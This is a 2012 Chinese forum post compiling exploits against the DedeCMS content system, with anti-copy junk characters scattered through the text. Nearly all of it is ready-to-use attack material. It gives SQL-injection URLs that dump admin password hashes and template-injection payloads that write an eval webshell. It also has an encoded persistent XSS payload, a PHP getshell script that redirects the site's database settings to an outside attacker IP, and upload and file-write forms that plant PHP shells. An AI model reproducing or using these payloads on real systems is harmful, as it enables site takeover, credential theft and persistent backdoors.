dedecms漏洞总结

admin · 发表于 2012-10-18 10:42:14

Dedecms 5.6 rss注入漏洞' q- Y' d- L) e. Q$ c
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
1 `  s  j3 P7 [$ i7 M; h. d" U0 e6 J5 e- J7 y8 k9 x. M' r0 ^
; B; ^+ n! Y, L4 [! U
$ X) F% ?: r5 C9 l! d6 N4 [

9 g( n" U1 ]; G! P
7 j6 j4 f4 F6 b' ^! {. u5 o. B& ^1 ~# S$ W, d3 K5 j3 t; }

1 ?  c( u* h) D6 }4 z
( a; a, U" _# Q* W8 dDedeCms v5.6 嵌入恶意代码执行漏洞5 l5 D. @7 H/ ]0 s* o' d* P
注册会员，上传软件：本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
, _& o: p; L( {- M4 S发表后查看或修改即可执行8 S0 N6 Q4 r# d. x
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}6 n4 X) c  w6 h. X
生成x.php 密码xiao，直接生成一句话。; P/ U- O0 i- O3 s% c

2 n6 |6 Y. a+ ^: M) Q( [- D
: D: k0 z2 `+ {
5 ]; f$ x! n/ C; P( m. d" \
$ v, S) I4 n0 V5 g% e# ^4 o
  O" V8 ]( v2 G  N# R  }- r
8 ~& s2 W& [6 C3 {; w
4 R/ |  U/ q7 Z- I* t3 C
9 x8 \2 K0 W) U+ DDede 5.6 GBK SQL注入漏洞
$ [6 O: X+ `7 z8 n6 Ehttp://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';( R. u. m/ G  S( t
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
4 j) K( l+ a& [, v5 jhttp://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
/ v+ L$ h% |+ x% }% s: E
, M# @! b5 d4 s1 J7 _1 |( t6 Z  O7 r0 ]/ y, x

% X+ \, d0 B  k5 K& ^) f' ]1 a% J$ }; ~2 F; A
( R% q$ |7 u0 Q. a) g* d
/ I4 q- S3 W. G0 t- s. Z) Z) y
DEDECMS 全版本 gotopage变量XSS漏洞
) P  y# w) h; Y6 u1.复制粘贴下面的URL访问，触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞，需关闭XSS筛选器。
& p6 W0 _  f" k& Mhttp://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="* o0 B$ \7 P0 j8 b' }  F+ ~
9 h- X9 }  g& o

3 h: f2 L) ~2 c2 s- c  y2.关闭浏览器，无论怎么访问下面的任意URL，都会触发我们的XSS。
" m8 D' o  W- \: Mhttp://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php

color=Red]DeDeCMS(织梦)变量覆盖getshell
( N, h9 c( s; @9 C1 p#!usr/bin/php -w
0 J4 Q2 Z) w- j1 C2 K<?php
& t5 f' \5 t- yerror_reporting(E_ERROR);" W2 `7 C3 K9 N4 m" `
set_time_limit(0);
8 k5 ?' `) Q. f2 v  Gprint_r(', [) x( G9 ]. w* K/ S, w
DEDEcms Variable Coverage
; y. A0 T4 }9 N/ d6 j$ D+ ~Exploit Author: www.heixiaozi.comwww.webvul.com
);) G) S1 V9 }) l' F: _% S  P. R
echo "\r\n";
( i, P- a1 y5 F7 Zif($argv[2]==null){
# K3 ?& ~+ F- l& o( V2 cprint_r('- c/ A$ O' |% g) h9 A+ B* ?
+---------------------------------------------------------------------------+
4 C* J* O; [1 g4 {Usage: php '.$argv[0].' url aid path
9 `3 l- y7 O% t9 T) m* S# ~" Waid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/% u, i2 w. k4 O5 Z* }
Example:
+ ]& Y, f0 [4 o8 h, H# Jphp '.$argv[0].' www.site.com 1 old
  ?& C- A1 `8 O7 d% C7 [+ [3 Y3 k+---------------------------------------------------------------------------+" k( G% {8 q' e; L. D
');
# O: q# U& f8 _6 @; m; kexit;
2 x! W* l3 y8 s  Z2 X" {}
- o; I; G6 R  A* E. v3 a$url=$argv[1];
1 M; D: @& r  T  B: C# l$aid=$argv[2];
9 @1 l6 ?+ ]; j5 s$path=$argv[3];
2 `6 e# h9 Y3 p6 u' W4 a$exp=Getshell($url,$aid,$path);
& e% S$ Z) s5 K: F, L# B/ cif (strpos($exp,"OK")>12){% {" ]) B% e5 P
echo "# W" e. q1 f" U- ]5 B" R
Exploit Success \n";
! o% J6 f+ u/ e5 C9 F$ \if($aid==1)echo "
  h, f* q+ n0 gShell:".$url."/$path/data/cache/fuck.php\n" ;! z9 Z4 k. N" i8 w2 S

4 _8 F: b6 r" a' n! u& G
5 x$ a- e* ?+ D# mif($aid==2)echo "
8 C0 x9 g0 o9 U; i: DShell:".$url."/$path/fuck.php\n" ;
; [, r+ \7 i4 J
9 N  K4 z$ r' |+ V  Z; l: ]9 ?6 \+ @; M3 T  E
if($aid==3)echo "5 ?! R1 P  S! o
Shell:".$url."/$path/plus/fuck.php\n";8 Y* S# R. }- s* g1 |% J% b& g% |, D
- C" }7 v2 v$ {) D$ V7 g" T* o
/ T6 ]! r- I% @7 w
}else{
& a5 Y* h5 S' zecho "8 a9 I8 c% V! j7 g+ X: u1 I
Exploit Failed \n";
& E8 f& g3 v9 Y" Q}5 F4 w( {$ t+ B) ?, s2 [/ ^) Q
function Getshell($url,$aid,$path){
+ g/ K+ V. q* ?, k: r. I- R$id=$aid;, t# F$ {: U! e' G$ r
$host=$url;
" k5 @5 J  {9 d. L; s$port="80";
. i) M1 Q) C. K! [& T- v6 n( Y$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";3 H5 G' o% }5 U! E! x5 v" ^; g
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";7 r9 w0 Q: |+ Z6 U
$data .= "Host: ".$host."\r\n";2 I* t/ w% S; \; z5 \( z1 G/ P
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
0 C9 ^) j0 o9 r. \4 C% R0 E$ U6 v2 \$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
# I4 V6 s5 v. e) D2 d$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
1 _/ j2 _1 G  |) b//$data .= "Accept-Encoding: gzip,deflate\r\n";
- W3 [& [7 t# k$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
. X9 P9 f# U+ E$data .= "Connection: keep-alive\r\n";% O4 q4 r, M/ {- G
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
& n; B( N7 i# V2 Q- ?2 q9 ?$data .= "Content-Length: ".strlen($content)."\r\n\r\n";9 G, ^4 N! i8 N9 F- X, Z7 A- H
$data .= $content."\r\n";
3 W3 ]* O$ J1 C% W* |$ock=fsockopen($host,$port);
  B; R: y# m* Gif (!$ock) {$ {/ U5 z- l& s! J/ \
echo "- y( F, a9 j% r+ E1 {% ~) w6 x# [0 [
No response from ".$host."\n";
" j! F7 c  f7 z, J* F% @1 e4 X}+ H  N0 L" M/ q# t7 v
fwrite($ock,$data);8 b4 G) V  R9 @9 B
while (!feof($ock)) {
6 R; l* O+ i( @/ [1 d$exp=fgets($ock, 1024);2 U7 u* D4 C' `
return $exp;
' `( X' Z6 T# l( b8 L) B7 G6 J}
; h7 w- a- g: V+ u}
+ X1 m7 Z9 P  A
4 d  y9 @9 [$ ]) Y  b. r. e& g' S; r
?>
8 t% O+ k0 F8 x, j+ u3 Y4 e: F0 O
3 B) `% O0 I0 w( ^: z4 o8 g% T2 P# O4 i" u& i+ D1 h( n

: O  O" F7 K, H2 W$ A
0 {' w" s* `( j" j2 Y; @% l
1 I8 d% p; `5 I& L' P9 j6 F# d" J( \
9 [9 V" N5 L# R8 Q  R* U/ ~

: i8 @8 C( [& V: c1 \5 O* ?( i7 w1 p) f. z. B
3 D( B1 c# R* d9 J% _' L
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
) Z( Z' d4 R$ z: ~http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root1 O. }  I; H" |! M# g
4 o; _% t) D% I1 }3 b& b0 R8 C
9 x7 K) P0 S( r, f: V
把上面validate=dcug改为当前的验证码，即可直接进入网站后台+ N& Q& h/ ^" S9 r' P1 ~

* |; ~4 z, g* o0 V2 a' i& e4 O9 ^% c" ^7 {
此漏洞的前提是必须得到后台路径才能实现, j, \8 X, g! d$ Q# e: G0 g6 T

! k7 j& T  s" Q* v8 |$ I
5 H. n' f- S) o& y3 _0 W
3 K3 U& \2 w. b% r
8 q( }+ T, L+ j" ~8 p$ D+ X2 y2 W' E0 s# O2 [) ]& q6 j$ n( J+ B

( X+ |+ I3 n+ @) ^! T3 A9 X4 `  _+ |) _( F. X" z

& T) \2 i  y) c" I6 o& @( u( j9 _$ U6 e- B2 }2 }( o- k
; b3 B1 B% ?/ r0 K1 a
Dedecms织梦标签远程文件写入漏洞$ _2 I' j+ v( n* w8 T1 |! x
前题条件，必须准备好自己的dede数据库，然后插入数据： insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
; y/ w4 r8 K! i& S; U" H3 _) v  {
; K5 ]) u2 D5 M
+ \0 R7 V  S4 y) I5 G: H& R% d再用下面表单提交，shell 就在同目录下 1.php。原理自己研究。。。 , b/ h7 b1 }0 }! Q' V
<form action="" method="post" name="QuickSearch" id="QuickSearch">
2 C/ s6 y" d! A# c1 Q* i<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
7 V$ \# P4 p5 g  J& i<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
! _" i5 j4 z( v7 i<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />' ]% M/ O4 E: N) N
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
* u& }+ p" {% f2 I" O( B<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
4 o2 |; N" h/ ~<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />0 H. {6 Z4 K0 F+ V0 m. }+ y6 J5 I
<input type="text" value="true" name="nocache" style="width:400">
* x2 j  G$ P" P# ^0 D5 W+ n<input type="submit" value="提交" name="QuickSearchBtn"><br />
2 B" ~2 v% q6 h$ @! ]( m</form>
( U/ I: O+ M3 z2 J& r<script>
% N. ~- S0 V5 nfunction addaction()
- @# L0 e  d1 v' g{
7 y1 m" N  V* g, m  |document.QuickSearch.action=document.QuickSearch.doaction.value;
) t5 O# L- J) q. K}; F* {- s5 G$ x$ S& z
</script>
1 H. G" ]' {* r; [
3 t% ^  H) G  _* Y3 e/ H# Q
1 ~+ Q; X% I5 Y" z6 V  I3 h: T
. a$ t* Y( w0 X8 j/ f4 Q
: Y: Z4 D/ w+ V5 d' |
9 C: w7 o" J( l7 q& g* ^8 i/ b8 F. ~, [3 M. \0 y9 S  _

- d: p/ d! ]3 |0 D( i3 i' p* k8 `- t- Q% j5 o
( t' ~. J" Q7 _$ [% d5 B
2 c1 s/ V: S+ F7 \
DedeCms v5.6 嵌入恶意代码执行漏洞
7 {7 z( u. e. h: i6 ]& {" o注册会员，上传软件：本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}，发表后查看或修改即可执行
0 k3 N8 |! h  I" {a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}9 b! C* ]3 c1 L( H
生成x.php 密码：xiao直接生成一句话。密码xiao 大家懂得# q; Y7 J4 g$ u; E$ t' n: {
Dedecms <= V5.6 Final模板执行漏洞( j1 D. L5 G& O$ O- U2 B  s! j  E
注册一个用户，进入用户管理后台，发表一篇文章，上传一个图片，然后在附件管理里，把图片替换为我们精心构造的模板，比如图片名称是：
* i: L0 ~( t( Zuploads/userup/2/12OMX04-15A.jpg6 X' C+ U) U0 i7 Y1 ^

: Y* D- X0 ^, Q) Y" y9 c: a" [% l
5 n3 Q" P7 `* c; E) |- e1 l  {模板内容是（如果限制图片格式，加gif89a）：! Z  n8 b" e/ D+ c
{dede:name runphp='yes'}8 {7 G  p) b* P7 x. }* Z
$fp = @fopen("1.php", 'a');
, c) j: z+ l% U5 d! i  p@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
) _8 V/ W& }5 E! A& m4 T; ]@fclose($fp);
& r- h9 ?# {8 i. s! D{/dede:name}
& a: C4 b/ o* T" X! U& }: G- _2 修改刚刚发表的文章，查看源文件，构造一个表单：
; s4 w8 f* h. X: Z! c+ H" Q# i<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">' s- K0 E/ l8 j! P0 E
<input type="hidden" name="dopost" value="save" />3 Z, S6 a2 O. g- }, j) f) n: d
<input type="hidden" name="aid" value="2" />5 ]0 i) G" e" V* t( N0 n
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
" V: D2 c) b* b+ A1 J. Q/ e<input type="hidden" name="channelid" value="1" />
9 l6 @! I1 s& Y2 v* M: T7 f& b1 c7 L<input type="hidden" name="oldlitpic" value="" />
1 x3 r, G- J  f5 m<input type="hidden" name="sortrank" value="1275972263" />, ^, Y4 P. s! ]" {2 k

, u+ ?, V' n4 D8 q% H, d4 r- y% T+ X2 c- {
<div id="mainCp">
7 g. e$ N: `# I9 o<h3 class="meTitle"><strong>修改文章</strong></h3>/ Q4 ^' ]9 ]4 \. m( w; F# s7 N) y

) p3 L6 J# R( o
/ G( K$ V; e0 [( J% X" d: k<div class="postForm">2 X6 o! V$ r5 ~) B( u% V; z
<label>标题：</label>1 o( U  S" h7 W) W: i. T
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
" l& F& v" B  ]+ p* Q5 s9 T& d
  W( e9 Z; J  x6 s6 f, r- h) |1 O3 d2 f/ y. n: h& b+ `
<label>标签TAG：</label>
* c0 x2 P$ C9 r# Y8 }<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)* U, [1 w5 W5 c8 m0 q, H

* o4 N" u; f$ g1 Z- e# F  L; k6 f' f, l0 A$ H1 N3 r. t
<label>作者：</label>
  T/ W9 H9 V1 H  }; T<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
; T. W7 Y4 K+ E  t6 j0 l/ ?$ G. J' n0 N; R; I. M5 B7 r9 N

$ A5 a$ }' e9 i- h& u8 s<label>隶属栏目：</label>
* r! @; T7 k% }3 J, `9 \<select name='typeid' size='1'>
5 m7 W( d0 x2 s, Q9 B3 ^# o, Y' o<option value='1' class='option3' selected=''>测试栏目</option>! O: R6 N" D4 H+ q8 \* U
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类): ^. l, n2 h3 U6 u
, `# g2 f* S: i  f! f' t: [

: p) Q" l: ]" j# r- D' W<label>我的分类：</label>
& c: a7 f! V1 u<select name='mtypesid' size='1'>9 \; z% B' A8 z3 {  ^& G5 {7 T2 f
<option value='0' selected>请选择分类...</option>7 N( j8 p0 @! v8 ]" c6 E9 R+ y& Z
<option value='1' class='option3' selected>hahahha</option>
8 n! Y9 v5 |( D/ Q</select>
. u( g1 c( `2 o3 |: b
8 N+ F7 L) `% Q" o1 T
+ @$ ?4 Q' Q$ s6 I6 M  y<label>信息摘要：</label>
0 k+ F: @3 O  T6 ]  A  G<textarea name="description" id="description">1111111</textarea>
0 U& z8 k0 A' P* m+ G2 Z(内容的简要说明)3 q( w$ r( K  D. j9 `
0 |7 a9 y! A5 o5 I& W3 {

- `- H* m+ i9 N  d. Y) M: t5 A<label>缩略图：</label>8 g# U, ]4 G; v; E; A8 y4 Y
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
" S/ o% N# ?# K' V
: E+ Y+ {. }9 D9 Q& `
* h9 F+ A* o' r% Y0 I<input type='text' name='templet'8 Y4 L6 B1 N9 O
value="../ uploads/userup/2/12OMX04-15A.jpg">' l$ ~3 F! y) J7 D# U' V4 ]
<input type='text' name='dede_addonfields'
5 Q' i9 m! `% Mvalue="templet,htmltext;">（这里构造）+ t+ }. ^! U% C; s
</div>
0 H* F# t& O+ T' [) K1 E4 k4 _4 C$ O# r7 T  [, |% N% Q' c1 w
7 k6 e9 |6 [  X7 ?9 L

: y) w9 r) j2 O<h3 class="meTitle">详细内容</h3>
/ S- n; S& K& I5 f# l, Z
' p$ j& e0 m: M+ ^
1 _" k7 y% Q: S( B<div class="contentShow postForm">
6 p$ a, T! I% N4 g<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
1 j) V! p" C* }; L2 r' A1 T( _* ]* _( A+ q4 s& _
- x, s- C) d, v* w5 w
<label>验证码：</label>
9 u) ~% D+ B; A* O/ w% ~<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' /># q8 g& y" v' X
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清？点击更换" align="absmiddle" style="cursor:pointer" />5 E5 n$ d+ |' r  R. J0 Z5 M# A, H! i8 q
5 W& e0 b- w! o7 ~) y# ]
$ G- r+ s4 O# y( ^: b7 K! U
<button class="button2" type="submit">提交</button>
: a  S0 S2 T4 c4 |& u  m# _<button class="button2 ml10" type="reset">重置</button>
2 h9 _$ p6 \% M) J, Q</div>
) l1 `& |% {$ `* B5 B- X4 v' M  A+ S* Z) F
) h* ^( {) b: V" G2 F
</div>
/ u5 b% T" J. P6 Q- J$ F$ z2 _% G# H, [- G
* t2 P1 x7 q/ O
</form>
% Y* U% Y2 b: \8 G, P; Y! b( R& F1 i/ }4 b
/ w+ c* B6 R6 h+ i; q1 m; ~
提交，提示修改成功，则我们已经成功修改模板路径。 3 访问修改的文章：
) |' l$ g3 S" }1 W2 R: Y假设刚刚修改的文章的aid为2，则我们只需要访问：
$ ~+ {7 w; Z$ o7 Uhttp://127.0.0.1/dede/plus/view.php?aid=2
即可以在plus目录下生成webshell：1.php* P% e) R: H/ B4 i: R

' p4 Q. W( {1 |/ b* P
( L% V2 p$ f4 v5 @, w  V# c- l, L1 y) f: a) a9 H3 \" `

& J! n1 T: B* B8 H, @# B
  w& Z1 B$ G- x4 Q/ A# }
& b+ c* ?. y* x9 Q4 A) u. E. q, n. r, \! M0 T
: E2 v* B$ Z" ~

2 F( B; z+ s$ v8 q. ?+ Q1 @; C
5 g& U! h; r# ~- ~) c& a' \5 q3 k3 Q& M' F6 ^

3 M9 e8 i, d: M) v) w4 D! ]3 zDEDECMS网站管理系统Get Shell漏洞(5.3/5.6)( t  k$ d2 [! @% K; g# @' u& t. D& C
Gif89a{dede:field name='toby57' runphp='yes'}4 T" n, U! l+ }# F
phpinfo();. _; x9 W! d: A' y+ `
{/dede:field}
' k. }$ I7 T8 S! X2 o保存为1.gif
) E! S3 D8 \  j. Y<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> 5 D$ g: p- |. J2 B$ H: z
<input type="hidden" name="aid" value="7" />
' O4 O; n6 R! A<input type="hidden" name="mediatype" value="1" />
  e6 d6 w2 Q; S) o- L* U<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> 7 R; a! ^. N8 A/ H
<input type="hidden" name="dopost" value="save" />
4 F9 k; r# \- B<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
' ]8 i! @7 m- F' B% ^<input name="addonfile" type="file" id="addonfile"/>
0 a! s" Q. r/ P2 M9 u4 t/ [8 H<button class="button2" type="submit" >更改</button>
' `5 v" u* a& G0 P% x+ c</form> + L+ [% G/ E* u+ ]& D8 V+ Y# \

3 F8 z, I0 y5 j  {" K; Q( S6 F. }7 o4 u; q* k- q9 O: Z
构造如上表单，上传后图片保存为/uploads/userup/3/1.gif
  d7 c% e2 m0 N, M% t% ^发表文章，然后构造修改表单如下：
0 a: A6 e: p. N! o; D. U2 D0 h1 t7 ?9 X3 ^3 ~! f

: @& t2 x% X& t1 |# A- [/ Y. Z<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
5 \1 P$ j: {; Z7 f0 E0 P+ U<input type="hidden" name="dopost" value="save" /> ) W  @- t* _2 e/ S$ J/ {" k1 X
<input type="hidden" name="aid" value="2" />
2 y8 a9 [/ t$ O# R<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
2 v( l, y( n+ o% ]<input type="hidden" name="channelid" value="1" />
. b" Y. A6 W# p9 h3 z1 r- c+ f% K+ {<input type="hidden" name="oldlitpic" value="" />
4 j4 r: ?0 K3 B: j7 P. O<input type="hidden" name="sortrank" value="1282049150" /> " O7 {3 F: Z: c& r  b& O
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> & v/ ?0 u, w. N9 W' v; @
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> ' p. w' a4 D; N9 j* M$ F' `
<select name='typeid' size='1'> " d. z- [% g6 Z" a
<option value='1' class='option3' selected=''>Test</option> ) O  n. E  I+ ?9 |( @1 O
<select name='mtypesid' size='1'>
* }% }& @4 ~- h# J- {- h( [, |<option value='0' selected>请选择分类...</option>
4 A+ x+ ]3 q9 E% a<option value='1' class='option3' selected>aa</option></select>
: M9 g7 |* |4 h5 ^3 v<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> $ M/ J# @9 y5 o7 |/ I) A
<input type='hidden' name='dede_addonfields' value="templet">
- j! X* a' O* r  c: S4 K/ N! U- |<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> . X- P9 Z5 V1 `
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
; a* c* _% g6 W* F, g<button class="button2" type="submit">提交</button> + C% `' h! ^7 h
</form>  v2 p( c7 n5 ?2 ?7 \' Q

. }0 B2 _0 \8 r4 ]) T
2 K- n# }5 P9 m, h2 w5 }9 a1 I  J3 Q  c6 e3 W; i; X2 @
$ g' U2 o+ T' p$ l" g# r7 K; u: _

8 a% G" H- ]1 F# ^9 `* ^& z  |' _  N/ p$ d, N/ p6 F, g# S
) I: ^& r8 b0 M  |& i

% V' \) ?# F2 _
0 v0 r. m, Z) O. {& Z7 f; X9 d7 }9 h( e

! k# v8 Q/ I+ V/ u* T6 A) ^) G1 x4 T5 u& H
织梦(Dedecms)V5.6 远程文件删除漏洞) j! D; Y  b5 ?. b( f' f4 C
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
+ [/ x7 k/ d$ j6 p+ ?$ thttp://www.test.com/plus/carbuya ... urn&code=../../
) f" N5 t7 c# H3 y! \& z2 S5 M
0 `) _& E: e0 {# H& b
8 S' n) W+ X4 X1 x* e2 q  L
, x2 S) A9 I6 w2 Q8 G+ n2 c* ?3 J
; `; _3 l8 N$ k% a" s7 F( ~) U

- V$ x8 I! s: _/ W' ]% r1 A9 z5 i
+ {( G- |+ [9 C& S
3 \: Z% r/ y1 I7 d. b* O: @: ]6 S" N

# ~2 M# P" u; z8 G0 p$ jDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 - V% p6 ^) g0 k7 X, I# X
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
0 B" q, g; l$ g3 A. v密码是32位MD5减去头5位，减去尾七位，得到20 MD5密码，方法是，前减3后减1，得到16位MD5; I% p' m: ~: f# t% Q5 _  e8 j8 y( R
0 J, d3 I3 L) k8 m
; a7 A& _8 S* F* ]1 K( D
/ x- P, u! I% r; x
. l+ @8 k$ ?' W4 v. U! }* ^

( N9 B( h. |9 x8 O" B; i0 c! U" ?. q4 d9 h- g' A, d& X' b, Z% t5 N

2 g, S9 K. x2 V
! d4 l, }# x0 i8 @# L" _, w
8 M& R) D7 g1 x
9 Q! ^3 n$ w6 D& i- F3 K织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
/ ?! ?: R% Q* F0 }7 Q- J! \http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
, p% Q9 ^$ F; e: o; i1 \8 s( ?7 P! W

  d  `' l8 C5 V' K# u; z* C2 i* Q, s' x# v0 e
# y; {5 l* ^: |7 ]6 G7 Y+ W9 n
) o) {" M! w& R* w0 `6 R
, Q" g5 s- C; i( U0 n

* F% }6 b7 a4 b" n! P+ H2 g( @5 v2 l8 p

5 `6 p/ n4 ~/ S6 S8 ]$ p' H8 N* C$ ~1 {- e! N" {# T3 J
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
  x/ u1 U9 r% A0 i- R% P<html>
# P6 A/ F( B* o<head>* e0 ?$ i9 x$ f
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
# A6 x, K1 X6 F7 m7 S1 t+ k</head>: I9 I8 ~7 W( P8 `! N( F' j+ @# Z! Z+ s
<body style="FONT-SIZE: 9pt">
( T4 W& U5 u+ V* b$ C) K---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />$ N' _+ `2 a% Q  N4 S
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>' R# ?. F8 V* S1 w# `% E
<input type='hidden' name='activepath' value='/data/cache/' />
7 k0 i. b  v6 j2 D<input type='hidden' name='cfg_basedir' value='../../' />4 ?. z. k- N5 U9 \
<input type='hidden' name='cfg_imgtype' value='php' />2 A1 a9 F$ {% T
<input type='hidden' name='cfg_not_allowall' value='txt' />
+ U( ?% a3 }% u  X# Y4 g( L<input type='hidden' name='cfg_softtype' value='php' />2 z( s- z3 v% `, x
<input type='hidden' name='cfg_mediatype' value='php' />
  x9 |: ^: P4 g- v  F: m4 }<input type='hidden' name='f' value='form1.enclosure' />. V8 M" b3 J$ G% z' ]6 p1 V
